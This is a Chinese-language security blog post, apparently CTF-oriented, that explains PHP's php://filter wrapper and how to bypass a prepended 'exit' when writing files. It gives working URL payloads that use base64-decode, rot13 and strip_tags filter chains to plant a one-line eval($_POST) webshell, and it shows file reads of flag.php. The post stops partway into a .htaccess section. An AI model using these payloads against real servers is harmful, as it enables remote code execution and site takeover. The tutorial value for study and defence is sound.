<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
    
    
        
            
                <link rel="shortcut icon" href="/images/favicon.ico">
            
        
        
            
                <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
            
        
        
            
                <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
            
        
    
    <!-- title -->
    <title>详解php://filter以及死亡绕过</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <link href="https://fonts.googleapis.com/css?family=Noto+Sans+SC&display=swap" rel="stylesheet">
    <link href="https://cdn.jsdelivr.net/gh/tonsky/FiraCode@2/distr/fira_code.css" rel="stylesheet">
    <!-- rss -->
    
    
<meta name="generator" content="Hexo 5.4.0"></head>

<body class="max-width mx-auto px3 ltr">

    <div id="header-post">
    <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
    <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
    <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i
                class="fas fa-chevron-up fa-lg"></i></a>
    <span id="menu">
    <span id="nav">
      <ul>
          
              <li><a href="/">Home</a></li>
          
              <li><a href="/archives/">Articles</a></li>
          
              <li><a href="/categories/">Category</a></li>
          
              <li><a href="/tags/">Tag</a></li>
          
              <li><a href="/about/">About</a></li>
          
              <li><a href="/search/">Search</a></li>
          
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
          
              <li><a class="icon" href="/2021/05/26/NEEPU-Sec-2021-%E5%85%AC%E5%BC%80%E8%B5%9B-WP/"><i class="fas fa-chevron-left"
                                                                           aria-hidden="true"
                                                                           onmouseover="$('#i-prev').toggle();"
                                                                           onmouseout="$('#i-prev').toggle();"></i></a></li>
          
          
              <li><a class="icon" href="/2021/05/19/2021%E5%B9%B4%E5%9B%9B%E5%B7%9D%E7%9C%81%E5%A4%A7%E5%AD%A6%E7%94%9F%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%8A%80%E8%83%BD%E5%A4%A7%E8%B5%9B-writeup/"><i class="fas fa-chevron-right"
                                                                           aria-hidden="true"
                                                                           onmouseover="$('#i-next').toggle();"
                                                                           onmouseout="$('#i-next').toggle();"></i></a></li>
          
          <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i
                          class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();"
                          onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true"
                                        onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();"
                                        onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
    <li><a class="icon"
           target="_blank" rel="noopener" href="https://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?url=http://example.com/2021/05/23/%E8%AF%A6%E8%A7%A3php-filter%E4%BB%A5%E5%8F%8A%E6%AD%BB%E4%BA%A1%E7%BB%95%E8%BF%87/&title=详解php://filter以及死亡绕过"><i
                    class="fab fa-qq " aria-hidden="true"></i></a></li>
    <li><a class="icon"
           target="_blank" rel="noopener" href="https://service.weibo.com/share/share.php?url=http://example.com/2021/05/23/%E8%AF%A6%E8%A7%A3php-filter%E4%BB%A5%E5%8F%8A%E6%AD%BB%E4%BA%A1%E7%BB%95%E8%BF%87/&title=详解php://filter以及死亡绕过"><i
                    class="fab fa-weibo " aria-hidden="true"></i></a></li>
    <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2021/05/23/%E8%AF%A6%E8%A7%A3php-filter%E4%BB%A5%E5%8F%8A%E6%AD%BB%E4%BA%A1%E7%BB%95%E8%BF%87/&text=详解php://filter以及死亡绕过"><i
                    class="fab fa-twitter " aria-hidden="true"></i></a></li>
    <li><a class="icon" href="mailto:?subject=详解php://filter以及死亡绕过&body=Check out this article: http://example.com/2021/05/23/%E8%AF%A6%E8%A7%A3php-filter%E4%BB%A5%E5%8F%8A%E6%AD%BB%E4%BA%A1%E7%BB%95%E8%BF%87/"><i
                    class="fas fa-envelope " aria-hidden="true"></i></a></li>
</ul>
    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E8%AF%A6%E8%A7%A3php-filter%E4%BB%A5%E5%8F%8A%E6%AD%BB%E4%BA%A1%E7%BB%95%E8%BF%87"><span class="toc-number">1.</span> <span class="toc-text">详解php:&#x2F;&#x2F;filter以及死亡绕过</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#php-filter"><span class="toc-number">1.1.</span> <span class="toc-text">php:&#x2F;&#x2F;filter</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%BF%87%E6%BB%A4%E5%99%A8"><span class="toc-number">1.2.</span> <span class="toc-text">过滤器</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AD%97%E7%AC%A6%E4%B8%B2%E8%BF%87%E6%BB%A4%E5%99%A8"><span class="toc-number">1.2.1.</span> <span class="toc-text">字符串过滤器</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#string-strip-tags"><span class="toc-number">1.2.2.</span> <span class="toc-text">string.strip_tags</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%BD%AC%E6%8D%A2%E8%BF%87%E6%BB%A4%E5%99%A8"><span class="toc-number">1.2.3.</span> <span class="toc-text">转换过滤器</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#convert-base64"><span class="toc-number">1.2.3.1.</span> <span class="toc-text">convert.base64</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#convert-quoted"><span class="toc-number">1.2.3.2.</span> <span class="toc-text">convert.quoted</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#convert-iconv"><span class="toc-number">1.2.3.3.</span> <span class="toc-text">convert.iconv.*</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8E%8B%E7%BC%A9%E8%BF%87%E6%BB%A4%E5%99%A8"><span class="toc-number">1.2.4.</span> <span class="toc-text">压缩过滤器</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8A%A0%E5%AF%86%E8%BF%87%E6%BB%A4%E5%99%A8"><span class="toc-number">1.2.5.</span> <span class="toc-text">加密过滤器</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%BB%95%E8%BF%87%E6%AD%BB%E4%BA%A1exit"><span class="toc-number">1.3.</span> <span class="toc-text">绕过死亡exit</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#bypass%E4%B8%8D%E5%90%8C%E5%8F%98%E9%87%8F"><span class="toc-number">1.3.1.</span> <span class="toc-text">bypass不同变量</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#base64%E7%BB%95%E8%BF%87"><span class="toc-number">1.3.1.1.</span> <span class="toc-text">base64绕过</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#rot13%E7%BB%95%E8%BF%87"><span class="toc-number">1.3.1.2.</span> <span class="toc-text">rot13绕过</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#string-strip-tags-1"><span class="toc-number">1.3.1.3.</span> <span class="toc-text">string.strip_tags</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#htaccess%E7%9A%84%E9%A2%84%E5%8C%85%E5%90%AB%E5%A4%84%E7%90%86"><span class="toc-number">1.3.1.4.</span> <span class="toc-text">.htaccess的预包含处理</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#bypass%E7%9B%B8%E5%90%8C%E5%8F%98%E9%87%8F"><span class="toc-number">1.3.2.</span> <span class="toc-text">bypass相同变量</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#base64"><span class="toc-number">1.3.2.1.</span> <span class="toc-text">base64</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#rot13%E7%BB%95%E8%BF%87-1"><span class="toc-number">1.3.2.2.</span> <span class="toc-text">rot13绕过</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#convert-iconv-1"><span class="toc-number">1.3.2.3.</span> <span class="toc-text">convert.iconv.*</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#VMCTF-Checkin"><span class="toc-number">1.3.3.</span> <span class="toc-text">VMCTF Checkin</span></a></li></ol></li></ol></li></ol>
    </div>
  </span>
</div>

<div class="content index py4">
    
    <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
    <header>
        
    <h1 class="posttitle" itemprop="name headline">
        详解php://filter以及死亡绕过
    </h1>

        <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">
            John Doe
            
        </span>
      </span>
            
    <div class="postdate">
        
            <time datetime="2021-05-23T13:44:17.000Z"
                  itemprop="datePublished">2021-05-23</time>
            
                (Updated:
                <time datetime="2021-05-23T13:45:07.332Z"
                      itemprop="dateModified">2021-05-23</time>)
            
        
    </div>

            
            
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/php/" rel="tag">php</a>
    </div>

        </div>
    </header>
    
    <div class="content" itemprop="articleBody">
        <h1 id="详解php-filter以及死亡绕过"><a href="#详解php-filter以及死亡绕过" class="headerlink" title="详解php://filter以及死亡绕过"></a>详解php://filter以及死亡绕过</h1><h2 id="php-filter"><a href="#php-filter" class="headerlink" title="php://filter"></a>php://filter</h2><p>PHP 提供了一些杂项输入/输出（IO）流，允许访问 PHP 的输入输出流、标准输入输出和错误描述符， 内存中、磁盘备份的临时文件流以及可以操作其他读取写入文件资源的过滤器。</p>
<ul>
<li>php:// — 访问各个输入/输出流（I/O streams）</li>
<li>php://filter 是一种元封装器， 设计用于数据流打开时的筛选过滤应用。 这对于一体式（all-in-one）的文件函数非常有用，类似 readfile()、 file() 和 file_get_contents()， 在数据流内容读取之前没有机会应用其他过滤器。</li>
</ul>
<p><code>php://filter</code> 参数</p>
<p><code>php://filter</code>可以作为一个中间流来处理其他流。</p>
<table>
<thead>
<tr>
<th align="left">名称</th>
<th align="left">描述</th>
</tr>
</thead>
<tbody><tr>
<td align="left"><code>resource=&lt;要过滤的数据流&gt;</code></td>
<td align="left">这个参数是必须的。它指定了你要筛选过滤的数据流。</td>
</tr>
<tr>
<td align="left"><code>read=&lt;读链的筛选列表&gt;</code></td>
<td align="left">该参数可选。可以设定一个或多个过滤器名称，以管道符（`</td>
</tr>
<tr>
<td align="left"><code>write=&lt;写链的筛选列表&gt;</code></td>
<td align="left">该参数可选。可以设定一个或多个过滤器名称，以管道符（`</td>
</tr>
<tr>
<td align="left"><code>&lt;；两个链的筛选列表&gt;</code></td>
<td align="left">任何没有以 <code>read=</code> 或 <code>write=</code> 作前缀 的筛选器列表会视情况应用于读或写链。</td>
</tr>
</tbody></table>
<p>测试代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br>    <span class="hljs-variable">$file1</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;file1&#x27;</span>];<br>    <span class="hljs-variable">$file2</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;file2&#x27;</span>];<br>    <span class="hljs-variable">$txt</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;txt&#x27;</span>];<br>    <span class="hljs-keyword">echo</span> file_get_contents(<span class="hljs-variable">$file1</span>);<br>    file_put_contents(<span class="hljs-variable">$file2</span>,<span class="hljs-variable">$txt</span>);<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>读取文件：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-comment"># 明文读取</span><br>index.php?file1=php:<span class="hljs-comment">//filter/resource=flag.php</span><br><br><span class="hljs-comment"># 编码读取</span><br>index.php?file1=php:<span class="hljs-comment">//filter/read=convert.base64-encode/resource=flag.php</span><br></code></pre></td></tr></table></figure>

<p>写入文件：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-comment"># 明文写入</span><br>index.php?file2=php:<span class="hljs-comment">//filter/resource=test.txt&amp;txt=helloworld</span><br><br><span class="hljs-comment"># 编码写入</span><br>index.php?file2=php:<span class="hljs-comment">//filter/write=convert.base64-encode/resource=test.txt&amp;txt=helloworld</span><br></code></pre></td></tr></table></figure>

<h2 id="过滤器"><a href="#过滤器" class="headerlink" title="过滤器"></a>过滤器</h2><h3 id="字符串过滤器"><a href="#字符串过滤器" class="headerlink" title="字符串过滤器"></a>字符串过滤器</h3><p><code>string.rot13</code></p>
<p><code>string.rot13</code>（自 PHP 4.3.0 起）使用此过滤器等同于用 <a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/function.str-rot13.php">str_rot13()</a>函数处理所有的流数据。</p>
<p><code>str_rot13</code>—对字符串执行<code>ROT13</code>转换. <code>ROT13</code>编码简单地使用字母表中后面第<code>13</code>个字母替换当前字母，同时忽略非字母表中的字符。编码和解码都使用相同的函数，传递一个编码过的字符串作为参数，将得到原始字符串。</p>
<p><code>string.toupper</code></p>
<p><code>string.tolower</code>（自 PHP 5.0.0 起）使用此过滤器等同于用 <a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/function.strtolower.php">strtolower()</a>函数处理所有的流数据。</p>
<p><code>strtoupper</code>—将字符串转化为大写</p>
<p><code>string.tolower</code></p>
<p>（自 PHP 5.0.0 起）使用此过滤器等同于用 <a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/function.strtolower.php">strtolower()</a>函数处理所有的流数据。</p>
<p><code>strtolower</code>—将字符串转化为小写</p>
<h3 id="string-strip-tags"><a href="#string-strip-tags" class="headerlink" title="string.strip_tags"></a>string.strip_tags</h3><p>使用此过滤器等同于用 <a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/function.strip-tags.php">strip_tags()</a>函数处理所有的流数据。可以用两种格式接收参数：一种是和<code>strip_tags()</code>函数第二个参数相似的一个包含有标记列表的字符串，一种是一个包含有标记名的数组。</p>
<p><code>strip_tags</code>—从字符串中去除 HTML 和 PHP 标记.该函数尝试返回给定的字符串<code>str</code>去除空字符、HTML 和 PHP 标记后的结果。它使用与函数<code>fgetss()</code>一样的机制去除标记。</p>
<h3 id="转换过滤器"><a href="#转换过滤器" class="headerlink" title="转换过滤器"></a>转换过滤器</h3><p>如同 string.* 过滤器，convert.* 过滤器的作用就和其名字一样。转换过滤器是 PHP 5.0.0 添加的。对于指定过滤器的更多信息，请参考该函数的手册页。</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">https:<span class="hljs-regexp">//</span>www.php.net<span class="hljs-regexp">/manual/</span>zh/filters.convert.php<br></code></pre></td></tr></table></figure>

<h4 id="convert-base64"><a href="#convert-base64" class="headerlink" title="convert.base64"></a>convert.base64</h4><p><code>convert.base64-encode</code>和 <code>convert.base64-decode</code>使用这两个过滤器等同于分别用<code>base64_encode()</code>和<code>base64_decode()</code>函数处理所有的流数据。<code>convert.base64-encode</code>支持以一个关联数组给出的参数。如果给出了<code>line-length</code>，base64 输出将被用<code>line-length</code>个字符为 长度而截成块。如果给出了<code>line-break-chars</code>，每块将被用给出的字符隔开。这些参数的效果和用<code>base64_encode()</code>再加上 chunk_split()相同。</p>
<h4 id="convert-quoted"><a href="#convert-quoted" class="headerlink" title="convert.quoted"></a>convert.quoted</h4><p><code>convert.quoted-printable-encode</code>和<code>convert.quoted-printable-decode</code>使用此过滤器的<code>decode</code>版本等同于用 <code>quoted_printable_decode()</code>函数处理所有的流数据。没有和<code>convert.quoted-printable-encode</code>相对应的函数。<code> convert.quoted-printable-encode</code>支持以一个关联数组给出的参数。除了支持和<code>convert.base64-encode</code>一样的附加参数外，<code>convert.quoted-printable-encode</code>还支持布尔参数<code>binary和 force-encode-first</code>。<code>convert.base64-decode</code>只支持<code>line-break-chars</code>参数作为从编码载荷中剥离的类型提示。</p>
<h4 id="convert-iconv"><a href="#convert-iconv" class="headerlink" title="convert.iconv.*"></a>convert.iconv.*</h4><p>这个过滤器需要<code>php</code>支持 <code>iconv</code> ，而<code>iconv</code>是默认编译的。使用<code>convert.iconv.*</code>过滤器等同于用<code>iconv()</code>函数处理所有的流数据。</p>
<p><code>iconv</code> — 字符串按要求的字符编码来转换</p>
<p>convery.iconv.*的使用有两种方法:</p>
<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs pgsql">convert.iconv.&lt;<span class="hljs-keyword">input</span>-<span class="hljs-keyword">encoding</span>&gt;.&lt;output-<span class="hljs-keyword">encoding</span>&gt; <br><span class="hljs-keyword">or</span> <br>convert.iconv.&lt;<span class="hljs-keyword">input</span>-<span class="hljs-keyword">encoding</span>&gt;/&lt;output-<span class="hljs-keyword">encoding</span>&gt;<br></code></pre></td></tr></table></figure>

<p>支持的字符编码有一下几种（详细参考<a target="_blank" rel="noopener" href="https://www.php.net/manual/en/mbstring.supported-encodings.php">官方手册</a>）</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">UCS</span>-<span class="hljs-number">4</span>*<br><span class="hljs-attribute">UCS</span>-<span class="hljs-number">4</span>BE<br><span class="hljs-attribute">UCS</span>-<span class="hljs-number">4</span>LE*<br><span class="hljs-attribute">UCS</span>-<span class="hljs-number">2</span><br><span class="hljs-attribute">UCS</span>-<span class="hljs-number">2</span>BE<br><span class="hljs-attribute">UCS</span>-<span class="hljs-number">2</span>LE<br><span class="hljs-attribute">UTF</span>-<span class="hljs-number">32</span>*<br><span class="hljs-attribute">UTF</span>-<span class="hljs-number">32</span>BE*<br><span class="hljs-attribute">UTF</span>-<span class="hljs-number">32</span>LE*<br><span class="hljs-attribute">UTF</span>-<span class="hljs-number">16</span>*<br><span class="hljs-attribute">UTF</span>-<span class="hljs-number">16</span>BE*<br><span class="hljs-attribute">UTF</span>-<span class="hljs-number">16</span>LE*<br><span class="hljs-attribute">UTF</span>-<span class="hljs-number">7</span><br><span class="hljs-attribute">UTF7</span>-IMAP<br><span class="hljs-attribute">UTF</span>-<span class="hljs-number">8</span>*<br><span class="hljs-attribute">ASCII</span>*<br></code></pre></td></tr></table></figure>

<h3 id="压缩过滤器"><a href="#压缩过滤器" class="headerlink" title="压缩过滤器"></a>压缩过滤器</h3><p>虽然 <a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/wrappers.compression.php">压缩封装协议</a> 提供了在本地文件系统中 创建 gzip 和 bz2 兼容文件的方法，但不代表可以在网络的流中提供通用压缩的意思，也不代表可以将一个非压缩的流转换成一个压缩流。对此，压缩过滤器可以在任何时候应用于任何流资源。</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">Note</span>: 压缩过滤器 不产生命令行工具如 gzip的头和尾信息。只是压缩和解压数据流中的有效载荷部分。 <br><br><span class="hljs-attribute">zlib</span>.* 压缩过滤器自 PHP 版本 <span class="hljs-number">5</span>.<span class="hljs-number">1</span>.<span class="hljs-number">0</span>起可用，在激活 zlib的前提下。也可以通过安装来自 » PECL的 » zlib_filter包作为一个后门在 <span class="hljs-number">5</span>.<span class="hljs-number">0</span>.x版中使用。此过滤器在 PHP <span class="hljs-number">4</span> 中 不可用。<br></code></pre></td></tr></table></figure>

<figure class="highlight stata"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs stata">?<span class="hljs-keyword">file</span>=<span class="hljs-keyword">compress</span>.zlib:<span class="hljs-comment">//flag.php</span><br></code></pre></td></tr></table></figure>

<h3 id="加密过滤器"><a href="#加密过滤器" class="headerlink" title="加密过滤器"></a>加密过滤器</h3><p><code>mcrypt.</code>*和 <code>mdecrypt.*</code>使用<code>libmcrypt</code>提供了对称的加密和解密。这两组过滤器都支持<code>mcrypt</code>扩展库中相同的算法，格式为 <code>mcrypt.ciphername</code>，其中<code>ciphername</code>是密码的名字，将被传递给<code>mcrypt_module_open()</code>。有以下五个过滤器参数可用：</p>
<p><img src="https://github.com/woshilnp/woshilnp.github.io/blob/master/wzimg/248.png?raw=true" alt="a"></p>
<h2 id="绕过死亡exit"><a href="#绕过死亡exit" class="headerlink" title="绕过死亡exit"></a>绕过死亡exit</h2><h3 id="bypass不同变量"><a href="#bypass不同变量" class="headerlink" title="bypass不同变量"></a>bypass不同变量</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-variable">$filename</span>=<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;filename&#x27;</span>];<br><span class="hljs-variable">$content</span>=<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;content&#x27;</span>];<br>file_put_contents(<span class="hljs-variable">$filename</span>,<span class="hljs-string">&quot;&lt;?php exit();&quot;</span>.<span class="hljs-variable">$content</span>);<br></code></pre></td></tr></table></figure>

<p><code>$content</code>在开头增加了exit过程，导致即使我们成功写入一句话，也执行不了。那么这种情况下，如何绕过这个<code>“死亡exit”</code>？</p>
<p>思路其实也很简单我们只要将<code>content</code>前面的那部分内容使用某种手段（编码等）进行处理，导致<code>php</code>不能识别该部分就可以了。</p>
<p>这里的<code>$_POST[‘filename’]</code>是可以控制协议的.</p>
<h4 id="base64绕过"><a href="#base64绕过" class="headerlink" title="base64绕过"></a>base64绕过</h4><p><code>Base64</code>编码是使用64个可打印ASCII字符（A-Z、a-z、0-9、+、/）将任意字节序列数据编码成ASCII字符串，另有“=”符号用作后缀用途。</p>
<p><code>base64</code>编码中只包含64个可打印字符，而PHP在解码<code>base64</code>时，遇到不在其中的字符时，将会跳过这些字符，仅将合法字符组成一个新的字符串进行解码</p>
<p>当<code>$content</code>被加上了<code>&lt;?php exit; ?&gt;</code>以后，我们可以使用<code>php://filter/write=convert.base64-decode</code>来首先对其解码。在解码的过程中，字符<code>&lt; ? ; &gt; </code>空格等一共有7个字符不符合<code>base64</code>编码的字符范围将被忽略，所以最终被解码的字符仅有<code>”phpexit”</code>和我们传入的其他字符。</p>
<p>由于，<code>”phpexit”</code>一共7个字符，但是<code>base64</code>算法解码时是4个byte一组，所以我们可以随便再给他添加一个字符。这样前边的<code>phpexit</code>加上另一个字符就会被<code>base64</code>解码，然后后边的我们精心构造的<code>base64</code>字符串也会被成功解码为php代码。</p>
<p>payload:</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">?filename=php:<span class="hljs-regexp">//</span>filter<span class="hljs-regexp">/convert.base64-decode/</span>resource=<span class="hljs-number">1</span>.php&amp;content=aPD9waHAgZXZhbCgkX1BPU1RbYV0pOw==<br></code></pre></td></tr></table></figure>

<p>成功写入</p>
<p><img src="https://github.com/woshilnp/woshilnp.github.io/blob/master/wzimg/249.png?raw=true" alt="a"></p>
<h4 id="rot13绕过"><a href="#rot13绕过" class="headerlink" title="rot13绕过"></a>rot13绕过</h4><p><code>str_rot13</code>—对字符串执行<code>ROT13</code>转换. <code>ROT13</code>编码简单地使用字母表中后面第<code>13</code>个字母替换当前字母，同时忽略非字母表中的字符。编码和解码都使用相同的函数，传递一个编码过的字符串作为参数，将得到原始字符串。</p>
<p>利用<code>php://filter</code>中<code>string.rot13</code>过滤器去除<code>”exit”</code>。<code>string.rot13</code>的特性是编码和解码都是自身完成，利用这一特性可以去除<code>exit</code>。 <code>&lt;?php exit;?&gt;</code> 在经过<code>rot13</code>编码后会变成 <code>&lt;?cuc rkvg();?&gt;</code> ，不过这种利用手法的前提是PHP不开启<code>short_open_tag/</code></p>
<p><img src="https://github.com/woshilnp/woshilnp.github.io/blob/master/wzimg/250.png?raw=true" alt="a"></p>
<p>虽然官方说的默认开启，但是在<code>php.ini</code>中默认是注释掉的，也就是说它还是默认关闭。</p>
<p>payload:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">?filename=php:<span class="hljs-comment">//filter/write=string.rot13/resource=2.php&amp;content=<span class="hljs-meta">&lt;?</span>cuc riny($_CBFG[n]);</span><br></code></pre></td></tr></table></figure>

<p>成功写入文件 2.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?</span>cuc rkvg();<span class="hljs-meta">&lt;?php</span> <span class="hljs-keyword">eval</span>(<span class="hljs-variable">$_POST</span>[a]);<br></code></pre></td></tr></table></figure>

<h4 id="string-strip-tags-1"><a href="#string-strip-tags-1" class="headerlink" title="string.strip_tags"></a>string.strip_tags</h4><p><code>strip_tags</code>— 从字符串中去除 HTML 和 PHP 标记。该函数尝试返回给定的字符串 str 去除空字符、HTML 和 PHP 标记后的结果。它使用与函数<code>fgetss()</code>一样的机制去除标记。</p>
<p><img src="https://github.com/woshilnp/woshilnp.github.io/blob/master/wzimg/251.png?raw=true" alt="a"></p>
<p>但是我们的目的是写入<code>webshell</code>，如果那样的话，我们的<code>webshell</code>岂不是同样起不了作用，不过我们可以使用多个过滤器进行绕过这个限制（<code>php://filter</code>允许通过使用多个过滤器）。</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs awk"><span class="hljs-number">1</span>、webshell用base64编码   <span class="hljs-regexp">//</span>为了避免strip_tags的影响<br><br><span class="hljs-number">2</span>、调用string.strip_tags <span class="hljs-regexp">//</span>这一步将去除&lt;?php <span class="hljs-keyword">exit</span>; ?&gt;<br><br><span class="hljs-number">3</span>、调用convert.base64-decode <span class="hljs-regexp">//</span>这一步将还原base64编码的webshell<br></code></pre></td></tr></table></figure>

<p>payload:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">?filename=php:<span class="hljs-comment">//filter/write=string.strip_tags|convert.base64-decode/resource=3.php&amp;content=<span class="hljs-meta">?&gt;</span>PD9waHAgZXZhbCgkX1BPU1RbYV0pOw==</span><br></code></pre></td></tr></table></figure>

<p>成功写入：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span> <span class="hljs-keyword">eval</span>(<span class="hljs-variable">$_POST</span>[a]);<br></code></pre></td></tr></table></figure>

<h4 id="htaccess的预包含处理"><a href="#htaccess的预包含处理" class="headerlink" title=".htaccess的预包含处理"></a>.htaccess的预包含处理</h4><p>PHP中<code>auto_prepend_file</code>与<code>auto_append_file</code>用法实例分析：</p>
<p><code>php.ini</code>中有两项：</p>
<figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs angelscript"><span class="hljs-built_in">auto</span>_prepend_file 在页面顶部加载文件<br><span class="hljs-built_in">auto</span>_append_file 在页面底部加载文件<br></code></pre></td></tr></table></figure>

<p>使用这种方法可以不需要改动任何页面，当需要修改顶部或底部<code>require</code>文件时，只需要修改<code>auto_prepend_file</code>与<code>auto_append_file</code>的值即可。</p>
<p>例如：修改<code>php.ini</code>，修改<code>auto_prepend_file</code>与<code>auto_append_file</code>的值。</p>
<figure class="highlight ini"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs ini"><span class="hljs-attr">auto_prepend_file</span> = <span class="hljs-string">&quot;/home/fdipzone/header.php&quot;</span><br><span class="hljs-attr">auto_append_file</span> = <span class="hljs-string">&quot;/home/fdipzone/footer.php&quot;</span><br></code></pre></td></tr></table></figure>

